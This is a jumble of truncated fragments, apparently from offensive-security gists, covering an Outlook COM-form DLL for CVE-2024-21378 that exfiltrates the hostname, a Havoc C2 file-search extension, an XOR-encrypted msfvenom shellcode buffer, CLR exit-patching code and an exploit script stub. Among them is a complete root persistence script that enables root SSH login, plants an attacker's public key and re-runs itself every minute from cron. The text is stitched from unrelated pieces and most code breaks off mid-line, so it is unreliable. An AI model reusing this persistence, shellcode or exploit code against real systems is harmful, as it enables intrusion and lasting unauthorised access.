/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
# Ensure that the target has cron running! | |
# Persistence mechanism: a root cron job (installed below) re-runs /tmp/ssh.sh every
# minute. The script installs openssh-server, switches PermitRootLogin to "yes" in
# /etc/ssh/sshd_config, relaxes pam_loginuid for sshd, appends a public key to
# root's authorized_keys and restarts sshd.
# Defender notes: the observable artifacts are a new file in /etc/cron.d, a script
# in /tmp, a modified sshd_config/pam.d entry and an unexpected authorized_keys entry.
cat << EOF > /tmp/ssh.sh | |
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart | |
EOF | |
# Note: `touch authorized_keys` above has no path, so it creates an empty file in the
# working directory (cron runs the script from /tmp) — a second on-disk artifact.
chmod +x /tmp/ssh.sh | |
# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there. | |
# The cron entry runs as root every minute; nothing removes it once written.
echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh |
// White Knight Labs - Offensive Development | |
// Inline Assembly - Get Function Address | |
#include <iostream> | |
#include <windows.h> | |
// Function definition | |
void* GetFunctionAddress(const char* functionName) { | |
void* getFunctionAddr = nullptr; |
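#!/bin/bash
# Install Go from the distribution packages and build projectdiscovery's asnmap
# into $GOPATH/bin.
#
# Fixes relative to the original script: GOROOT/GOPATH were assigned but never
# exported, so the `go` child process never saw them, and GOROOT/bin was appended
# to PATH twice. GOROOT is deliberately not set: the apt-installed toolchain knows
# its own root, and exporting a non-existent /usr/local/go would make `go` fail.
set -euo pipefail

apt install golang -y

# Default module/bin location; honour a pre-existing GOPATH if the caller set one.
export GOPATH="${GOPATH:-$HOME/go}"
export PATH="${PATH}:${GOPATH}/bin"

go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest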
// | |
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++ | |
// | |
// Based on : | |
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/ | |
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs | |
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c | |
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;) |
#include <Windows.h> | |
#include <Psapi.h> | |
#include <metahost.h> | |
#include <comutil.h> | |
#include <mscoree.h> | |
#include "patch_info.h" | |
#include "base\helpers.h" | |
/** | |
* For the debug build we want: |
unsigned long hash_string(void* buffer, unsigned long size, char* extension){ | |
unsigned char current = 0; | |
unsigned long hash = 0; | |
unsigned char* currentChar = NULL; | |
hash = 1337; | |
currentChar = (void*)buffer; | |
hash++; | |
while(1){ | |
current = *currentChar; |
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Made by papi | |
# Created on: Di 10 Okt 2023 01:54:42 CEST | |
# auto_suite.py | |
# Description: | |
# A Havoc extension to search for files inside of infected agents | |
# Usage: | |
# To use this script save it on your machine and add it to the script manager of Havoc | |
# inside of: Scripts > Scripts Manager > Load Script |
#!/usr/bin/python3 | |
import requests | |
import sys | |
import uuid | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
#Disable annoying warnings about using burp proxy. | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
http_proxy = "http://127.0.0.1:8080" |